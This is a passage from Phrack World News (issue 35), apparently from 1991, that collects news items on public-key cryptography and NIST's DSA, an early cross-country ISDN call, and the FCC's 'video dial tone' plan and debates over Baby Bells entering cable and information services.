public key and a secret private key. Messages encoded with the private key can
only be decoded with the corresponding public key, and vice versa.  The public
keys are published like telephone numbers. The private keys are secret.  With
this technology, digital signatures are simple. Encode your message, or just
the name you sign it with, using your private key.  If the recipient can decode
the message with your public key, he can be confident it came from you.
Sending a confidential message -- putting electronic mail in a tamper-proof
envelope -- is equally straightforward.

     To send a secret to Alice encode it with her public key.  Only Alice (or
someone else who knows her private key) will be able to decode the message.
The heart of any system of public-key cryptography is a mathematical function
which takes in a message and a key, and puts out a code.  This function must be
fairly quick and easy to use, so that putting things into code does not take
forever.  It must be very hard to undo, so that getting things out of code does
take forever, unless the decoder has the decoding key.  Obviously, there must
be no easy way to deduce the private key from the public key.  Finding
functions that meet these criteria is "a combination of mathematics and
muddle," according to Roger Needham of the Cambridge Computer Laboratory.

     The greatest successes to arise from the muddle so far are those using
functions called prime factorisation algorithms.  They are based on the
mathematical insight that, while it is easy to multiply two numbers together,
it is very hard to work backwards to find the particular two numbers which were
multiplied together to produce some given number.  If Alice chooses two large
prime numbers as her private key and publishes their 150-digit product as her
public key, it would probably take a code-breaker thousands of years to work
backwards to calculate her private keys.

     A variety of schemes have been worked out which use this insight as the
basis for a workable public-key code.  Most popular of these is the so-called
RSA algorithm, named after the three MIT professors who created it -- Ronald
Rivest, Adi Shamir and Len Adleman.  It has been patented and is sold by a
Silicon Valley company, called RSA, that employs 15 people, most of them ex-MIT
graduate students.  Faculty firms are to computer start-ups what family firms
were to the industrial revolution.  RSA has attracted both academic praise and
a range of heavyweight commercial customers: Microsoft, Sun Microsystems,
Digital Equipment and Lotus Development. But, despite repeated applications, it
has never been endorsed by those in government.  Rumors abound that the
codebreakers in the National Security Agency have discouraged standard-setters
from recommending RSA because they do not want to promote the use of codes they
cannot break.  RSA, for obvious reasons, does not discourage the rumors.
Whatever the reason, the standard-setters at the NIST have sidestepped the
debate over RSA with their new algorithm, DSA.  As set out in the standard, DSA
verifies the identity of the sender, but does not encrypt the message.  It
appends to the message a number calculated from the message and the sender's
private key.  The recipient can then use this number, the message and the
sender's public key to verify that the message is what it seems.

     The NIST says that this technique is well suited to "smart cards" and
other applications where there is not a lot of computing power available for
working out codes.  Because it hopes that DSA will be used for verifying the
identity of everyone from welfare recipients to military contractors, its
flexibility is a boon.  Meanwhile, however, more and more companies are
choosing a public-key cryptography system for communicating confidentially --
often RSA, sometimes something different. Someday, probably soon, governments
will want to choose, too.  Watch out for fireworks when they do.
_______________________________________________________________________________

SWBT Sends Off First "Cross-Country" ISDN Call
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From Southwestern Bell Telephone

     The nation's first "cross-country" public network ISDN was placed last
week, courtesy of SWBT.  The historic first call was the result of a two-year
joint effort among SWBT, BellSouth Corp., US Sprint and Bellcore.  SWBT's
Advanced Technology Lab originated the call, which used US Sprint's digital
facilities in Burlingame, Calif.  The call terminated at a BellSouth switch
in Atlanta, Ga.

     Using an ISDN video application, SWBT's trial director Ken Goodgold was
able to see and talk to BellSouth's David Collins.  "With this test, the
geographic limits of ISDN-based services were stretched from a few miles to
cross-country," Goodgold says.  "We began with protocol testing and service
verification, two key parts of the process," Goodgold says. "That required an
extremely complex series of technical tests.  The Advanced Technology Lab staff
worked for months performing the tests leading up to the first successful
call."

     Last week's test call was significant from a marketing perspective as well
as a technical one.  That's because it demonstrated the economic benifits of
using ISDN for video information.  "The cost of a long distance call is
approximately the same, whether it's a voice transmission using a regular phone
line or a video transmission using ISDN," Goodgold says. "That means a big
reduction in cost to arrange a videoconference." US Sprint joined the test
because ISDN has evolved beyond the local stage, says Terry Kero, the carrier's
director of InfoCom Systems Development Labs.  "After today, it will be
technically possible to make an ISDN call across the country just as it is
possible today to make a regular long distance call," Kero says.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                               == Phrack Inc. ==

                 Volume Three, Issue Thirty-five, File 13 of 13

              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN           Issue XXXV / Part Four            PWN
              PWN                                             PWN
              PWN            Compiled by Dispater             PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


The Media Monopoly
~~~~~~~~~~~~~~~~~
by Dispater

     As we all know, more technology means more and more legal questions.  It
is important not only to understand the economic but social impacts of the
recent "Telco-TV" issue.  I think technologically the idea of transmitting
audio/video signals through phiber optic line is fascinating and a great
technological triumph.  However, how will society benefit by having an even
smaller number of owners controlling the media?  There is already a media
dynasty due to policies established in Ronald Reagan's presidency.

     Today almost all of the media is controlled by 18 global corporations.
That is down from 23 in 1990 and down from 50 corporations in 1983.  The trend
is very scary.  In the United States there are around 25,000 different media
voices.  This includes newspapers, book publishers, television stations, radio
stations, movie studios, and magazines.  However we should not kid ourselves
into thinking that there are 25,000 different owners.  Is it fair to that 23
companies have so much power over our lives?  It is incredibly dangerous to
allow this trend to continue.  We must stop this trend and "bust up" the media
as it was done in the pre-Reagan era.

    If you are concerned about this issue I strongly urge you to read "The
Media Monopoly" by Ben Bagdickian.  It is published by Beacon Press and runs
around 300 pages in length.
_______________________________________________________________________________

Phone Companies Could Transmit TV Under FCC Plan               October 25, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Edmund L. Andrews (The New York Times)

     In a surprising and controversial move to promote cable television
competition, the Federal Communications Commission proposed today that local
telephone companies be allowed to package and transmit television programming.

      The proposed rules, which were unanimously endorsed and are likely to be
adopted within a year, would expose cable companies to the most threatening
competition yet.  But they could benefit cable television consumers, many of
whom have seen their bills double and triple in recent years.

      The cable industry vowed to fight the proposals and threatened to
challenge the rules in court if they are adopted.  Telephone companies, eager
to enter a lucrative new business, applauded.

     "Today's action will create competition and offer consumers more choices,"
said James R. Young, vice-president of regulatory and industry relations at the
Bell Atlantic Corporation.  "Let's hope it's a beginning to the end of turf
wars."

     In essence, the commission recommended that telephone companies be allowed
to offer "video dial tone" over telephone lines that would carry programming
produced by outside companies.  Consumers could view whatever programs they
pleased and would be charged accordingly.

     Initially, telephone companies would serve primarily as a pipeline, not
producing the programs.  But the commission said telephone companies should
also be allowed to organize and package video services, as long as they make
their networks available to all programmers.  The commission also opened an
inquiry on whether to let telephone companies produce programs.

     The idea of allowing so-called video dial tone service has long been a
favorite of the FCC's chairman, Alfred C. Sikes.  Congress, which is weighing
regulatory legislation to rein in cable process has shied away from the issue.
Today's action makes it more likely that lawmakers will have to reconsider the
role of telephone companies in television.

     Before cable companies would feel much impact from today's FCC proposal,
however, most telephone companies would have to spend billions of dollars to
install new fiber-optic transmission lines and switching equipment that could
carry large volumes of television material.  Analysts have estimated that the
cost of converting every home in the country to a fiber-optic line would be
$100 billion to $200 billion and that it would take at least five years.

     Most large telephone companies, including all of the regional Bell
companies, already plan to replace their copper wires with fiber over the next
two decades.  The immense business opportunity posed by the $18 billion cable
television market is likely to accelerate those plans.

     High-capacity communications lines that reach every home in America could
radically alter the distribution of entertainment and enable people on home
computers to tap distant libraries and obtain information in seconds.

     "Both program providers and consumers would have chances they don't have
today, without the bottlenecks provided by cable companies and without the
bottlenecks of broadcasting," said Richard Firestone, chief of the FCC's common
carrier bureau.

     The move was immediately attacked by the National Cable Television
Association, which threatened to challenge any new rules in court.

     "Until and unless the telco's monopoly in voice telephone is ended, no
level of Government safeguards against cross-subsidies will be effective," said
James P. Mahoney, president of the cable association.

     The most controversial issue, which the FCC raised for discussion without
recommendation, is whether telephone companies should be allowed to produce
programming, a much bigger business than transmission.  Many Bush
Administration officials favor such a move, but television broadcasters and
producers bitterly oppose it.  Officials noted that such a shift would require
changes in the Cable Television Act of 1984.

     "Among the top two or three concerns of ever cable operator has always
been head-to-head competition against local telephone companies," said John
Mansell, a senior analyst at Paul Kagan Associates, a marketing-research firm
that monitors the cable industry.

     For telephone companies, the move could be a windfall.  Steven R.  Sieck,
vice president of Link Resources Inc., a market-research firm in New York,
said, "It's by far the largest market opportunity among the whole collection of
information services" for telephone companies.

     It remains unclear, however, whether the new rules will survive in court.
The Cable Television Act of 1984 bars a telephone company from owning a cable
television franchise in the same market.  The FCC ruled today, however, that
the law does not prevent a local telephone company from transmitting programs
produced by other companies and that it does not bar long-distance carriers in
any way.

     The Bell companies have lobbied strongly for legislation that would allow
them to enter the cable business, and several companies have invested in
European cable franchises.  In addition, Pacific Telesis Group, which provides
local phone service in California, already holds an option to buy a controlling
interest in a Chicago cable franchise, which could be [sic] permissible since
it is outside the company's telephone area.

     The commission also handed down a ruling that could give telephone
companies an important price advantage in future competition with cable
operators and could prompt protests from local governments, ruling that neither
a telephone company nor a video programmer needs to pay franchise fees to local
governments.

     Under the cable act, by contrast, local governments can charge cable
operators a franchise fee as high as five per cent of revenues.

     Explaining today's ruling, Mr. Sikes said, "We have segregation laws, and
these segregation laws should be ended."  He added that some cable companies
were already installing optical fibers in their own networks, and that some
were exploring the option of using their networks to offer telephone service.

     The proposals mark the second major change in longstanding restrictions on
the telephone companies' ability to move into new services.  Less than three
weeks ago, a Federal appeals court cleared the way for the regional Bell
companies to begin providing information services, like news, stock and sports
tables, immediately.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Phiber Optic or Twisted Pair?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John J. Keller (Wall Street Journal)                        October 28, 1991
                
     Expanding the nation's telephone network into a vast television broadcast
system is going to cost tens of billions of dollars and won't be finished
before the end of the decade, say executives at some of the largest phone
companies.

     But the scale of the project isn't stopping the phone giants, such as GTE
Corp., Ameritech, Bell Atlantic Corp., and Pacific Telesis Group, from
methodically exploring how to implement such a system.

     The Baby Bells and GTE have spent several million dollars testing new
systems that carry cable TV shows into homes via the phone network.  The phone
companies will spend many million of dollars more before they are satisfied
that they have a service that matches the current voice phone system and tops
today's entrenched cable TV monopolies.

     Last week the phone companies were buoyed by a Federal Communications
Commission plan to support a new technology called video dial tone, that would
put the big phone companies into direct competition with local cable-television
monopolies.

     Phone subscribers could use such a system to dial up and order video
programs from an entertainment company through the same wire that connects a
typical phone call.  More important, allowing the phone companies could
generate enough traffic to fund "broadband" upper-capacity information highways
that could someday carry TV, medical information, and even FM stereo channels
into a home through a single wire, say the executives.

     However, big hurdles remain.  The FCC hasn't decided whether to let the
phone companies participate in the programming end of the cable TV business.
The phone companies argue that's a financial necessity, because cable TV
companies would be reluctant to share the programs they now support and run
them over a rival's network.  In addition, the 1984 Cable TV Act, which
prohibits phone company participation in the cable business, would have to be
rewritten.

     "We're encouraged by the FCC action, but it's not as complete a step as
there needs to be made," said Larry J. Sparrow, vice president of regulatory
and governmental affairs at GTE Telephone Operations, Irvine, Texas.  Adds
Kathleen Ahren, Nynex Corp.'s director of federal regulatory policy: "For us to
build facilities without anyone to use them would be irresponsible...
programming is essential."

     There are also technical issues such as whether TV service to the home
should be provided through a cable-TV-like coaxial cable or advanced fiber-
optic line.  Either would require pulling out existing "twisted pair" wiring
that now binds the phones in homes and most small businesses to the local phone
network.  Moreover, the phone industry must still hammer out technical
standards for melding video transmission, which requires tremendous
transmission capacity, with voice traffic, which uses far less.

     The system that is finally built will require mountains of capital to
transform the existing phone network into a high-capacity phone network of
systems that pump signals digitally through fiber-optic transmission lines,
which are glass wires.  "We've seen figures that it would cost about $250
billion nationwide," says James R. Young, vice president of regulatory and
industry relations at Bell Atlantic.  Adds Ms. Ahern, "I don't think our plans
would have us doing this in less than 20 years and if we do you're talking
billions of dollars."

     Pacific Bell, which spends about $1 billion a year on new network
equipment, would see that annual tab jump by two to three times in the first
several years of constructing a broadband network, says Michael Bloom, customer
premise, broadband applications at the San Francisco-based unit of Pacific
Telesis Group.  But he notices that as equipment purchases grow and the
technology is perfected the annual cost should drop down to current levels
after about four years.

     PacBell, like most other phone companies, already has installed fiber-
optic "trunking" lines to carry bulk traffic between its switching centers.
 It has also begun replacing copper facilities in some neighborhoods, running
optical fibers to the pedestal at the curb and then connecting to the regular
phone home wires.  Someday these lines will carry cable TV, but for now
regulation restricts the phone company to voice and data transmission, says Mr.
Bloom.

     Someday this will change, says the FCC, which envisions a service where
phone customers would turn on their TVs and find a listing of TV shows, movies,
news and other programs, supplied by the phone company and other programmers
and accessible via remote control.

     Several phone companies are already testing such services.  In Cerritos,
Calif., GTE has built an elaborate network of fiber-optic and coaxial cables
lines and advanced switching systems to deliver TV services to several thousand
customers.  One service, called "Main Street," allows a customer with a remote
control to shop via TV, check a bank account and even seek information on
colleges in the US.  Another service, dubbed "Center Screen," lets 3,900
residential customers call for a movie or a TV show by dialling a special
number.  A third service lets some customers talk to one another through a
videophone in the house.

     "We've found [from the Cerritos tests] that our customers like full-motion
video and not still pictures," which is all that's possible over today's
regular phone lines, Mr. Sparrow says.

     That's because regular conversation travels over phone lines at the rate
of 64,000 bits a second.  By contract, "reasonable quality" video, such as the
kind that appears from a VCR tape, requires transmission capacity of at least
1.3 megabits to 1.5 megabits a second.  High quality video will take capacity
of 45 megabits to 90 megabits a second, he says.  A megabit equals 1 million
bits.

     To save money and get as much capacity out of the existing copper-based
systems, Bell Communications Research, the Baby Bell's research arm, has
developed "video compression" technology which uses existing copper wire to
deliver TV to the home.  With video compression, a microprocessor squashes
video signals so they can be sent through a regular phone line at the rate of
1.5 megabits a second.  The little chip, which is in an electronic box attached
to the phone line, looks at an incoming video signal, and filters out the parts
of the moving image that are redundant.  The chip codes and sends the parts of
the signal that are different through the phone line to a receiving box, which
decodes and reconstructs the image before projecting it onto the TV screen.

     The cable companies hope to retaliate by providing phone service through
their cable networks.  They are funding research to develop switching systems
that can pass phone calls from one cable subscriber to another and out to
customers using the regular phone system.

     But the blood between the industries isn't all bad.  Ameritech's Indiana
Bell subsidiary and Cardinal Communications, an Indiana cable TV operator, are
testing a fiber distribution system made by Broadband Technologies Inc, of
Raleigh, NC.  The system is being used to route video and phone signals over
backbone fiber-optic lines and finally through coaxial and twisted pair lines
attached to homes in Tipton Lake, a Columbus, Ind. residential development.
Bell Atlantic is negotiating with Loudon Cablevision, a cable TV company in
Loudon County, Va., to test the transmission of TV signals through phone
company lines to 5,000-6,000 homes in The Cascades, a local housing
development.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Baby Bells as Big Brother                                      November 2, 1991
~~~~~~~~~~~~~~~~~~~~~~~~
>From The New York Times

     Two official decisions in October, one liberating and the other
frightening, may shape telecommunications -- and America -- for decades.  The
liberating decision, by the Federal Communications Commission, proposes to
allow the seven regional telephone companies to transmit TV programs.

     If implemented, that proposal for video-by-phone would free families to
tell cable operators, if they misbehave, to get lost.

     The frightening decision, by a federal appeals court, unblocked the same
seven "Baby Bell" companies from owning electronic yellow pages, video shopping
and other information services.

     Unless Congress intervenes, this decision will allow the Baby Bells to
exploit their monopolistic stranglehold over residential phone lines and
dictate what information reaches nearly every home.  The same principle ought
to govern in both situations: democracy needs diversity.

     Technological advances have brought the nation to a regulatory crossroad.
A single information pipeline -- perhaps fiber-optic cable, perhaps enhanced
coaxial or copper wire -- may soon pour an unimaginable array of phone, video
and data communications into homes.  Whoever controls the pipeline controls
access to American minds.

     The best protection against Big Brother is to separate control of the
pipeline from the information.  That could be easily enforced by requiring that
pipeline owners, like the Baby Bells, serve only as common carriers and lease
pipeline space to information providers on a non-discriminatory basis.

     Common carrier status is what the FCC proposal would achieve for video
services but what the appeals court decision would foreclose for information
services.

     Congress seems unwilling to impose common carrier status. But Rep. Jim
Cooper, D-Tenn., offers a second-best remedy.  As long as the Baby Bells retain
monopoly control over local phone service, he would allow each to sell
information only outside its own region.  His bill also offers stringent
safeguards against anti-competitive behavior.
   
     Yet the bill's provisions aren't as safe as common carrier status.  The
Baby Bells have frequently violated regulations; rules alone are unlikely to
stop them from subsidizing forays into information services with funds
extracted from captive rate-payers.

     Contrary to their claims, the Baby Bells have no special abilities to
provide electronic services.  If they could sell video shopping for a profit,
so could hundreds of other companies -- not one of which has the power to
intimidate ratepayers because not one has privileged access to their homes.

     Nor, as the Baby Bells claim, do they need to produce their own
information services in order to fill capacity on fiber-optic cables they might
lay.

     The strongest argument the Baby Bells offer is technological.  Only a
single company, they contend, will be able to marry pipeline and information.
But there's no proof of this speculation and besides, there are better ways to
manage the problem.

     The Cooper bill provides plausible protection against monopolistic Baby
Bells, giving them ample room to compete but limited room to exploit.

     Newspapers, including The New York Times Co., support the bill for
competitive commercial reasons. But there is a much more important reason for
the public to favor, and Congress to adopt, the Cooper bill: to protect the
free, diverse flow of information on which democracy depends.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Don't Baby the Bells                                          November 10, 1991
~~~~~~~~~~~~~~~~~~~
>From The New York Times

     Although the Bell companies are opposed by numerous groups, including the
Consumer Federation of America, the cable television industry and existing
providers of electronic information services, it is the newspapers that are its
biggest opponents.

     The publishers argue that the telephone companies can compete unfairly by
subsidizing their services with money from their regulated telephone businesses
and by imposing technical obstacles to competing information suppliers.

     But one of their biggest fears is simply that the telephone companies
could attract a large proportion of the classified advertising, a mainstay for
newspapers, by offering cheap and easy-to-use electronic bulletin boards.

     The newspapers are pushing Congress to adopt a bill introduced by
Representative Jim Cooper, Democrat of Tennessee, which would not allow a Bell
company to offer information services unless those services are already
available to at least 50 percent of the people in the area over an alternative
network.

     As a practical matter, the bill would reinstate the information-service
ban for all Bell companies for years, because of the difficulty in building an
alternative network that reaches most customers.

     To defend their position as more than a simple bid to keep out
competition, the newspaper association has crafted a blunt advertising campaign
around the slogan "Don't Baby the Bells."

     In one ad, the association warns that the telephone companies could amass
as much private information on customers as the Internal Revenue Service.

     But while many members of Congress are worried about giving new powers to
the Bell companies, the Cooper bill has thus far attracted only 24 sponsors,
and most experts doubt the bill can muster enough support to pass even the
House.

     Meanwhile, the Bush administration strongly favors lifting the prohibition
on information services and would probably move to veto a bill that kept it in
place.  The upshot is that newspaper publishers are in a difficult position.

     A stalemate in Congress amounts to a complete victory for the Bell
companies, because court decisions have already given them precisely what they
want.

     In Congress, however, aides to leading lawmakers say they are waiting in
part to see how much popular and political strength each side can muster.  "We
want them to show us what they can bring," one staff member said about the
publishers.

     One lobbyist allied with the publishers said opponents of the Bell
companies were essentially trying to build up a bargaining position. "You could
see this as the beginning of a minuet," he said.  "The question is whether they
will ever get into the middle of the floor and dance."
_______________________________________________________________________________



--------------------------------------------------------------------------------